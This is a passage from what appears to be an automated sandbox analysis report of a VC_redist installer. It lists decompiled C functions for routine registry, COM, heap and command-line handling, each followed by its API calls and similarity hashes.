                                                                          • GetLastError.KERNEL32(?,000B3B34,00000000,?,000B1472,?,00000000,00000000,00000000,00000000,?,?,000B1511,?,?,00000001), ref: 000B39B4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$ErrorFreeLastProcess
                                                                          • String ID: @Met
                                                                          • API String ID: 406640338-2381362037
                                                                          • Opcode ID: ce14d319966e1f07fe76d653b1fbe693f03e23098b113f245935c607eb63cc52
                                                                          • Instruction ID: 2abc684aac260edeb26f81f7c2b25133c4bc96c74fe2ad3f503725ac8e883b0b
                                                                          • Opcode Fuzzy Hash: ce14d319966e1f07fe76d653b1fbe693f03e23098b113f245935c607eb63cc52
                                                                          • Instruction Fuzzy Hash: 40D05B326002346797206BFADC0CAA7BEDCFF456E17414022FD05D2510D739C810DAF4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CoInitializeEx.OLE32(00000000,00000000), ref: 000C55D9
                                                                          • CoUninitialize.OLE32(?,00000000,?,?,?,?,?,?,?), ref: 000C5633
                                                                          Strings
                                                                          • Failed to initialize COM on cache thread., xrefs: 000C55E5
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeUninitialize
                                                                          • String ID: Failed to initialize COM on cache thread.
                                                                          • API String ID: 3442037557-3629645316
                                                                          • Opcode ID: eb0d26fbed55edbb77497e62a055b8d2b0aedf65299b22f52d934f391ecce094
                                                                          • Instruction ID: 0241919937b621b1a81c796bc37af819f8f3fd1caea64b2e930fcd2782b3c73f
                                                                          • Opcode Fuzzy Hash: eb0d26fbed55edbb77497e62a055b8d2b0aedf65299b22f52d934f391ecce094
                                                                          • Instruction Fuzzy Hash: 35018472600619BFC7058FA5DC80EEAF7ACFF08354B408126FA09D7121DB31AE54DB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E000B501B(signed short* _a4) {
                                                                          				signed int _t8;
                                                                          				int _t9;
                                                                          				int _t12;
                                                                          				signed int _t13;
                                                                          				short* _t15;
                                                                          				signed int _t16;
                                                                          				signed short* _t17;
                                                                          				int _t19;
                                                                          
                                                                          				_t8 =  *0x11aa50; // 0x1
                                                                          				_t15 = L"burn.clean.room";
                                                                          				_t19 = 1;
                                                                          				if((_t8 & 0x00000001) != 0) {
                                                                          					_t9 =  *0x11aa4c; // 0xf
                                                                          				} else {
                                                                          					 *0x11aa50 = _t8 | 1;
                                                                          					_t9 = lstrlenW(_t15);
                                                                          					 *0x11aa4c = _t9;
                                                                          				}
                                                                          				_t17 = _a4;
                                                                          				if(_t17 == 0) {
                                                                          					L8:
                                                                          					_t19 = 0;
                                                                          				} else {
                                                                          					_t16 =  *_t17 & 0x0000ffff;
                                                                          					if(_t16 == 0x2d || _t16 == 0x2f) {
                                                                          						_t12 = CompareStringW(0x7f, _t19,  &(_t17[1]), _t9, _t15, _t9); // executed
                                                                          						if(_t12 != 2) {
                                                                          							goto L8;
                                                                          						} else {
                                                                          							_t13 =  *0x11aa4c; // 0xf
                                                                          							if( *((short*)(_t17 + 2 + _t13 * 2)) != 0x3d) {
                                                                          								goto L8;
                                                                          							}
                                                                          						}
                                                                          					} else {
                                                                          						goto L8;
                                                                          					}
                                                                          				}
                                                                          				return _t19;
                                                                          			}












                                                                          APIs
                                                                          • lstrlenW.KERNEL32(burn.clean.room,?,?,?,?,000B1104,?,?,00000000), ref: 000B503A
                                                                          • CompareStringW.KERNELBASE(0000007F,00000001,?,0000000F,burn.clean.room,0000000F,?,?,?,?,000B1104,?,?,00000000), ref: 000B506A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CompareStringlstrlen
                                                                          • String ID: burn.clean.room
                                                                          • API String ID: 1433953587-3055529264
                                                                          • Opcode ID: 288489b6ab776a08443ea780a1bbe42871ec58f247f381dc22d95e84968b8f99
                                                                          • Instruction ID: 61665ac76cde41da06dbdf4c4a914852d40c68e5fa5a252a338a43976104a95a
                                                                          • Opcode Fuzzy Hash: 288489b6ab776a08443ea780a1bbe42871ec58f247f381dc22d95e84968b8f99
                                                                          • Instruction Fuzzy Hash: 8A01F972510625AE83345B58ED84EF3BBECFF047617548116F645C3A10C3709C80DBE1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E000CE7EB(intOrPtr _a4) {
                                                                          				int _t5;
                                                                          				intOrPtr _t8;
                                                                          
                                                                          				_t8 = _a4;
                                                                          				_t5 = IsWindow( *(_t8 + 0x3e0));
                                                                          				if(_t5 != 0) {
                                                                          					PostMessageW( *(_t8 + 0x3e0), 0x10, 0, 0); // executed
                                                                          					return WaitForSingleObject( *(_t8 + 0x3e4), 0x3a98);
                                                                          				}
                                                                          				return _t5;
                                                                          			}






                                                                          APIs
                                                                          • IsWindow.USER32(?), ref: 000CE7F8
                                                                          • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 000CE80E
                                                                          • WaitForSingleObject.KERNEL32(?,00003A98,?,000B4B37,?,?,?,?,?,000FB490,?,?,?,?,?,?), ref: 000CE81F
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: MessageObjectPostSingleWaitWindow
                                                                          • String ID:
                                                                          • API String ID: 1391784381-0
                                                                          • Opcode ID: 41cb965d634bded3cdaa1857a531d8a3305a41a389eb0f6dacdd93dc91a71a1f
                                                                          • Instruction ID: 5b7fa5e8a5fe71dcc21fba205abc6f153cbc223202e167769e38cc794bfc5a56
                                                                          • Opcode Fuzzy Hash: 41cb965d634bded3cdaa1857a531d8a3305a41a389eb0f6dacdd93dc91a71a1f
                                                                          • Instruction Fuzzy Hash: 97E08C31280308BBE7221B60DC09FEA7BACFB08751F080529B249A50E0C7A67A10EB84
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 82%
                                                                          			E000F124D(void* _a4, short* _a8, char** _a12) {
                                                                          				int _v8;
                                                                          				char _v12;
                                                                          				int _v16;
                                                                          				signed short _t20;
                                                                          				void* _t23;
                                                                          				int* _t25;
                                                                          				signed short _t31;
                                                                          				int* _t34;
                                                                          				void* _t35;
                                                                          
                                                                          				_t33 = _a12;
                                                                          				_v16 = 8;
                                                                          				_v8 = 0;
                                                                          				_t34 = 0;
                                                                          				_v12 = 0;
                                                                          				_t20 = RegQueryValueExW(_a4, _a8, 0,  &_v8,  *_a12,  &_v16); // executed
                                                                          				_t31 = _t20;
                                                                          				_t23 =  <=  ? _t31 : _t31 & 0x0000ffff | 0x80070000;
                                                                          				if(_t23 != 0x80070002) {
                                                                          					if(_v8 == 1 || _v8 == 2) {
                                                                          						_t25 = E000F0F6E(_a4, _a8,  &_v12); // executed
                                                                          						_t34 = _t25;
                                                                          						if(_t34 >= 0) {
                                                                          							_t34 = E000F4B5A(0x80070002, _v12, 0, _t33);
                                                                          						}
                                                                          						goto L11;
                                                                          					} else {
                                                                          						if(_v8 != 0xb) {
                                                                          							_t34 = 0x8007070c;
                                                                          							_push(0x8007070c);
                                                                          							_push(0x27e);
                                                                          							L7:
                                                                          							_push("regutil.cpp");
                                                                          							E000B37D3(_t23);
                                                                          							L11:
                                                                          							if(_v12 != 0) {
                                                                          								E000F54EF(_v12);
                                                                          							}
                                                                          							return _t34;
                                                                          						}
                                                                          						if(_t31 == 0) {
                                                                          							goto L11;
                                                                          						}
                                                                          						_t35 = _t23;
                                                                          						_t23 = 0x80004005;
                                                                          						_t34 =  >=  ? 0x80004005 : _t35;
                                                                          						_push(_t34);
                                                                          						_push(0x279);
                                                                          						goto L7;
                                                                          					}
                                                                          				}
                                                                          				_t34 = 0x80070002;
                                                                          				goto L11;
                                                                          			}













                                                                          APIs
                                                                          • RegQueryValueExW.KERNELBASE(00000000,00000008,00000000,00000000,00000000,000000B0,000002C0,00000000,00000000), ref: 000F127B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: QueryValue
                                                                          • String ID: regutil.cpp
                                                                          • API String ID: 3660427363-955085611
                                                                          • Opcode ID: c4b8d2b8b26f9583224b99bff8a3772cdb9b81ae4bca82ccb91febd256b5fe79
                                                                          • Instruction ID: 6e4c56a01ea17ce5e687d39123091902c27ed15d8000075e79019bf70f9e2e97
                                                                          • Opcode Fuzzy Hash: c4b8d2b8b26f9583224b99bff8a3772cdb9b81ae4bca82ccb91febd256b5fe79
                                                                          • Instruction Fuzzy Hash: 2D214972A0111DFFDF649E9588449FEBBB9EB04360F1081B9EA14E7A11D2318E51EB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 83%
                                                                          			E000BF5E0(void* __ecx, intOrPtr _a4, signed int* _a8) {
                                                                          				signed int _v8;
                                                                          				signed int _v12;
                                                                          				void* _t19;
                                                                          				void* _t29;
                                                                          
                                                                          				_t25 = __ecx;
                                                                          				_push(__ecx);
                                                                          				_push(__ecx);
                                                                          				_v8 = _v8 & 0x00000000;
                                                                          				_v12 = _v12 & 0x00000000;
                                                                          				_t19 = E000F0E3F( *((intOrPtr*)(_a4 + 0x4c)),  *((intOrPtr*)(_a4 + 0x50)), 1,  &_v8); // executed
                                                                          				_t29 = _t19;
                                                                          				if(_t29 >= 0) {
                                                                          					_t29 = E000F0EEC(_t25, _v8, L"Installed",  &_v12);
                                                                          				}
                                                                          				if(_t29 == 0x80070002 || _t29 == 0x80070003) {
                                                                          					_t29 = 0;
                                                                          				}
                                                                          				 *_a8 = 0 | _v12 == 0x00000001;
                                                                          				if(_v8 != 0) {
                                                                          					RegCloseKey(_v8);
                                                                          				}
                                                                          				return _t29;
                                                                          			}








                                                                          APIs
                                                                            • Part of subcall function 000F0E3F: RegOpenKeyExW.KERNELBASE(?,00000000,00000000,00000000,00000001,00000000,?,000F5699,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,?,00000000,00000000), ref: 000F0E52
                                                                          • RegCloseKey.ADVAPI32(00000000,?,?,00000001,00000000,00000000,?,?,?,000C7B4D,?,?,?), ref: 000BF644
                                                                            • Part of subcall function 000F0EEC: RegQueryValueExW.ADVAPI32(00000004,?,00000000,00000000,?,00000078,00000000,?,?,?,000F56EF,00000000,?,000F63FF,00000078,00000000), ref: 000F0F10
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpenQueryValue
                                                                          • String ID: Installed
                                                                          • API String ID: 3677997916-3662710971
                                                                          • Opcode ID: 8d78c6d87e471112d635a94b04d2b9c13b26e965edb038e28f22131b305ced09
                                                                          • Instruction ID: 61f8ada2f4539392c84e2d7b3f3481c4f0a72a650cd49e87548f397b0522ab89
                                                                          • Opcode Fuzzy Hash: 8d78c6d87e471112d635a94b04d2b9c13b26e965edb038e28f22131b305ced09
                                                                          • Instruction Fuzzy Hash: 2D01A232910119FFCB11EB94CC46BEEBBB8EF04711F1141A4E900A7161D7765E50DB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 75%
                                                                          			E000F9006(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                          				signed int _v8;
                                                                          				signed int _v12;
                                                                          				void* _t23;
                                                                          				void* _t26;
                                                                          
                                                                          				_v12 = _v12 & 0x00000000;
                                                                          				_v8 = _v8 & 0x00000000;
                                                                          				_push(_a12);
                                                                          				_push( *0x11a7e4);
                                                                          				_push(_a8);
                                                                          				_t26 = E000B1F20( &_v12, L"%ls%ls\\%ls\\%ls",  *0x11a7e0);
                                                                          				if(_t26 >= 0) {
                                                                          					_t23 = E000F0E3F(_a4, _v12, 0x20019,  &_v8); // executed
                                                                          					_t26 = _t23;
                                                                          				}
                                                                          				if(_v8 != 0) {
                                                                          					RegCloseKey(_v8);
                                                                          					_v8 = _v8 & 0x00000000;
                                                                          				}
                                                                          				if(_v12 != 0) {
                                                                          					E000F54EF(_v12);
                                                                          				}
                                                                          				return _t26;
                                                                          			}








                                                                          APIs
                                                                          • RegCloseKey.ADVAPI32(00000000,000000B0,00000088,00000410,000002C0), ref: 000F905C
                                                                            • Part of subcall function 000F0E3F: RegOpenKeyExW.KERNELBASE(?,00000000,00000000,00000000,00000001,00000000,?,000F5699,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,?,00000000,00000000), ref: 000F0E52
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen
                                                                          • String ID: %ls%ls\%ls\%ls
                                                                          • API String ID: 47109696-1267659288
                                                                          • Opcode ID: fb83883285f67d1e84944abdfdbfd70fb3cc825e160324cab6bf1a357e177b2a
                                                                          • Instruction ID: 8fc60f117ecc84585ad49584b0acaccccca1e71fca3886cd93aefde2fa060b9e
                                                                          • Opcode Fuzzy Hash: fb83883285f67d1e84944abdfdbfd70fb3cc825e160324cab6bf1a357e177b2a
                                                                          • Instruction Fuzzy Hash: F201283280121CFBDF22AB90DD06BEDBFB9EB04366F004094FA0066461D7765BA0EB91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E000EF7E0(void* __ecx, intOrPtr* _a4, intOrPtr* _a8, WCHAR* _a12) {
                                                                          				int _v8;
                                                                          				int _t11;
                                                                          				void* _t12;
                                                                          				void* _t21;
                                                                          				void* _t30;
                                                                          				intOrPtr* _t33;
                                                                          
                                                                          				_t11 = lstrlenW(_a12);
                                                                          				_t33 = _a8;
                                                                          				_v8 = _t11;
                                                                          				_t30 = _t11 + _t11;
                                                                          				_t12 = E000EF462(_a4,  *_t33 + 4 + _t30); // executed
                                                                          				_t21 = _t12;
                                                                          				if(_t21 >= 0) {
                                                                          					 *( *_a4 +  *_t33) = _v8;
                                                                          					 *_t33 =  *_t33 + 4;
                                                                          					E000D1664( *_a4 +  *_t33, _t30, _a12, _t30);
                                                                          					 *_t33 =  *_t33 + _t30;
                                                                          				}
                                                                          				return _t21;
                                                                          			}

                                                                          APIs
                                                                          • lstrlenW.KERNEL32(00000000,00000000,?,?,00000000,?,000CD1B4,00000001,00000000,?,-00000001,?,?,00000000,00000001), ref: 000EF7EA
                                                                          • _memcpy_s.LIBCMT ref: 000EF82C
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: _memcpy_slstrlen
                                                                          • String ID:
                                                                          • API String ID: 2392212498-0
                                                                          • Opcode ID: 860caa3b786c3f4ceb6bdc2538d6f9b7248a770a9c401b7ec8affa0a3117a35a
                                                                          • Instruction ID: 3690af20740b9ea63b7cadc1ecefec948af356e9a43f9d6968eb436e44859763
                                                                          • Opcode Fuzzy Hash: 860caa3b786c3f4ceb6bdc2538d6f9b7248a770a9c401b7ec8affa0a3117a35a
                                                                          • Instruction Fuzzy Hash: EA014B75600305EFDB20CF4ACC84DAABBB8FF99310B10446DF94597321EA31AE50DBA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E000E85A5(void* __ecx) {
                                                                          				void* _t6;
                                                                          				void* _t14;
                                                                          				void* _t18;
                                                                          				WCHAR* _t19;
                                                                          
                                                                          				_t14 = __ecx;
                                                                          				_t19 = GetEnvironmentStringsW();
                                                                          				if(_t19 != 0) {
                                                                          					_t12 = (E000E856E(_t19) - _t19 >> 1) + (E000E856E(_t19) - _t19 >> 1);
                                                                          					_t6 = E000E5154(_t14, (E000E856E(_t19) - _t19 >> 1) + (E000E856E(_t19) - _t19 >> 1)); // executed
                                                                          					_t18 = _t6;
                                                                          					if(_t18 != 0) {
                                                                          						E000DF0F0(_t18, _t19, _t12);
                                                                          					}
                                                                          					E000E511A(0);
                                                                          					FreeEnvironmentStringsW(_t19);
                                                                          				} else {
                                                                          					_t18 = 0;
                                                                          				}
                                                                          				return _t18;
                                                                          			}

                                                                          APIs
                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 000E85A9
                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 000E85E9
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: EnvironmentStrings$Free
                                                                          • String ID:
                                                                          • API String ID: 3328510275-0
                                                                          • Opcode ID: 13f93322c44e8040f20d536249460377b3c8b3d321b4ef57aa2ca078168783c2
                                                                          • Instruction ID: 47b4c1165befc8efcb0804471daaa94b249883cfaf508e0f2e11bb060806634e
                                                                          • Opcode Fuzzy Hash: 13f93322c44e8040f20d536249460377b3c8b3d321b4ef57aa2ca078168783c2
                                                                          • Instruction Fuzzy Hash: 31E0E533101D516FE12222267C4AABF2A48DFC17B17254015F10CA6242FF248D0181B4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 58%
                                                                          			E000B38D4(long _a4, signed int _a8) {
                                                                          				void* _t7;
                                                                          
                                                                          				asm("sbb eax, eax");
                                                                          				_t7 = RtlAllocateHeap(GetProcessHeap(),  ~_a8 & 0x00000008, _a4); // executed
                                                                          				return _t7;
                                                                          			}

                                                                          APIs
                                                                          • GetProcessHeap.KERNEL32(00000000,?,?,000B1490,00000000,00000001,00000000,?,?,000B1511,?,?,00000001,00000000,00000000,?), ref: 000B38E5
                                                                          • RtlAllocateHeap.NTDLL(00000000,?,000B1490,00000000,00000001,00000000,?,?,000B1511,?,?,00000001,00000000,00000000,?), ref: 000B38EC
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$AllocateProcess
                                                                          • String ID:
                                                                          • API String ID: 1357844191-0
                                                                          • Opcode ID: eea6ce7192d17009e4698d9bf157553a2b999a4537b600ca68aa7ea106742eba
                                                                          • Instruction ID: 5f68e4dfcafe515ad5948d4c8379d5a0add69f10ead6c0afff7ba48af968e3c6
                                                                          • Opcode Fuzzy Hash: eea6ce7192d17009e4698d9bf157553a2b999a4537b600ca68aa7ea106742eba
                                                                          • Instruction Fuzzy Hash: 0AC012321A0208AB8B00AFF8EC0ECAA3BACBB686027408400B905C2510CB3CE024EB60
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 72%
                                                                          			E000F3499(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                                          				signed int _v8;
                                                                          				intOrPtr _v16;
                                                                          				intOrPtr _v20;
                                                                          				intOrPtr _v28;
                                                                          				short _v30;
                                                                          				void _v32;
                                                                          				void* _v36;
                                                                          				intOrPtr _v40;
                                                                          				char _v44;
                                                                          				intOrPtr* _v48;
                                                                          				void* _v56;
                                                                          				short _v64;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				void* __ebp;
                                                                          				signed int _t31;
                                                                          				void* _t39;
                                                                          				void* _t46;
                                                                          				void* _t48;
                                                                          				short _t49;
                                                                          				void* _t55;
                                                                          				intOrPtr* _t59;
                                                                          				signed int _t60;
                                                                          				void* _t65;
                                                                          				signed int _t74;
                                                                          				void* _t75;
                                                                          				void* _t76;
                                                                          
                                                                          				_t31 =  *0x11a008; // 0xf77c1860
                                                                          				_v8 = _t31 ^ _t74;
                                                                          				_v40 = _a4;
                                                                          				_v48 = _a12;
                                                                          				_t60 = 6;
                                                                          				memset( &_v32, 0, _t60 << 2);
                                                                          				_t76 = _t75 + 0xc;
                                                                          				_v36 = 0;
                                                                          				_v44 = 0;
                                                                          				__imp__#8( &_v64);
                                                                          				_t39 = E000F2F23(0,  &_v36, 0); // executed
                                                                          				_t59 = _v36;
                                                                          				_t69 = 1;
                                                                          				_t71 =  ==  ? 0x80004005 : _t39;
                                                                          				if(( ==  ? 0x80004005 : _t39) >= 0) {
                                                                          					_t46 =  *((intOrPtr*)( *_t59 + 0x110))(_t59, 0);
                                                                          					_t71 = _t46;
                                                                          					if(_t46 >= 0) {
                                                                          						_t48 =  *((intOrPtr*)( *_t59 + 0x118))(_t59, 0);
                                                                          						_t71 = _t48;
                                                                          						if(_t48 >= 0) {
                                                                          							_t49 = 0x12;
                                                                          							_v30 = _t49;
                                                                          							_v20 = _v40;
                                                                          							_v32 = 1;
                                                                          							_v28 = 1;
                                                                          							_v16 = _a8;
                                                                          							_t69 = _t76 - 0x10;
                                                                          							_v64 = 0x2011;
                                                                          							_v56 =  &_v32;
                                                                          							asm("movsd");
                                                                          							asm("movsd");
                                                                          							asm("movsd");
                                                                          							asm("movsd"); // executed
                                                                          							_t55 =  *((intOrPtr*)( *_t59 + 0xe8))(_t59,  &_v44);
                                                                          							_t71 =  ==  ? 0x8007006e : _t55;
                                                                          							if(( ==  ? 0x8007006e : _t55) >= 0) {
                                                                          								 *_v48 = _t59;
                                                                          								_t59 = 0;
                                                                          							}
                                                                          						}
                                                                          					}
                                                                          				}
                                                                          				if(_t59 != 0) {
                                                                          					 *((intOrPtr*)( *_t59 + 8))(_t59);
                                                                          				}
                                                                          				return E000DDE36(_t59, _v8 ^ _t74, _t65, _t69, _t71);
                                                                          			}

                                                                          APIs
                                                                          • VariantInit.OLEAUT32(?), ref: 000F34CE
                                                                            • Part of subcall function 000F2F23: GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,000F34DF,00000000,?,00000000), ref: 000F2F3D
                                                                            • Part of subcall function 000F2F23: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,000DBDED,?,000B52FD,?,00000000,?), ref: 000F2F49
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmp
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorHandleInitLastModuleVariant
                                                                          • String ID:
                                                                          • API String ID: 52713655-0
                                                                          • Opcode ID: a9d2ee5f85568af47f200e94236ec86b15a9944416841882a65c34767af5ca75
                                                                          • Instruction ID: 8f3c3b7ad405bd2cffbff6157e9105075ecd99b80f0dc550e996881a7e2778ed
                                                                          • Opcode Fuzzy Hash: a9d2ee5f85568af47f200e94236ec86b15a9944416841882a65c34767af5ca75
                                                                          • Instruction Fuzzy Hash: 16311C76E0061D9BCB11DFA8C884AEEB7F8EF48750F01456AED15EB311D6759E048BA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 96%
                                                                          			E000D993C(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr* _a52) {
                                                                          				intOrPtr* _t29;
                                                                          				intOrPtr* _t30;
                                                                          				intOrPtr* _t34;
                                                                          				signed int _t37;
                                                                          				intOrPtr _t42;
                                                                          				signed int _t46;
